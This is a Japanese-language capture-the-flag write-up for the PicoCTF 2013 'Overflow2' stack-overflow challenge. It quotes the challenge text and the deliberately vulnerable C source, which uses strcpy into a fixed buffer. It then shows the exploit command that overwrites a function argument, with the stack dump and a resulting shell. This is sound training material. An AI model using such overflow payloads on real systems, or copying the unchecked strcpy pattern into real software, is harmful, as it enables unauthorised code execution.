PicoCTF2013 Overflow2 Writeup

問題編

問題文

Category: Binary Exploitation Points: 100 Description:

Stack overflows are the most basic binary exploitation technique, but they take a lot of skill to master. If you already know some C, these problems can help acquaint you with stacks and binary exploitation in general.
Problem available on the shell machine in /problems/stack_overflow_2_44e63640e033ff2b , downloadable here with source here.
If you solve the problem you will be able to read the key file by running
cat /problems/stack_overflow_2_44e63640e033ff2b/key on the PicoCTF shell machine.
Hint: A function's arguments live on top of its stack frame, above its saved ebp and return address. Make sure not to clobber those, though...

ソースコード

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "dump_stack.h"

void vuln(int win, char *str) {
    char buf[64];
    strcpy(buf, str);
    dump_stack((void **) buf, 23, (void **) &win);
    printf("win = %d\n", win);
    if (win == 1) {
        execl("/bin/sh", "sh", NULL);
    } else {
        printf("Sorry, you lose.\n");
    }
    exit(0);
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: stack_overwrite [str]\n");
        return 1;
    }

    uid_t euid = geteuid();
    setresuid(euid, euid, euid);
    vuln(0, argv[1]);
    return 0;
}

解答編

main関数からvuln関数の第一引数が固定値0で渡されているが、それを変更すればよい。 戻りアドレスの直後がmain関数から渡される第一引数。

# ./overflow2-44e63640e033ff2b $(python -c 'import sys; sys.stdout.write("A"*80); sys.stdout.write("\x01")')
Stack dump:
0xffe7fac8: 0x00000000
0xffe7fac4: 0xffe807a0 (second argument)
0xffe7fac0: 0x00000001 (first argument)
0xffe7fabc: 0x41414141 (saved eip)
0xffe7fab8: 0x41414141 (saved ebp)
0xffe7fab4: 0x41414141
0xffe7fab0: 0x41414141
0xffe7faac: 0x41414141
0xffe7faa8: 0x41414141
0xffe7faa4: 0x41414141
0xffe7faa0: 0x41414141
0xffe7fa9c: 0x41414141
0xffe7fa98: 0x41414141
0xffe7fa94: 0x41414141
0xffe7fa90: 0x41414141
0xffe7fa8c: 0x41414141
0xffe7fa88: 0x41414141
0xffe7fa84: 0x41414141
0xffe7fa80: 0x41414141
0xffe7fa7c: 0x41414141
0xffe7fa78: 0x41414141
0xffe7fa74: 0x41414141
0xffe7fa70: 0x41414141 (beginning of buffer)
win = 1
sh-4.2# ls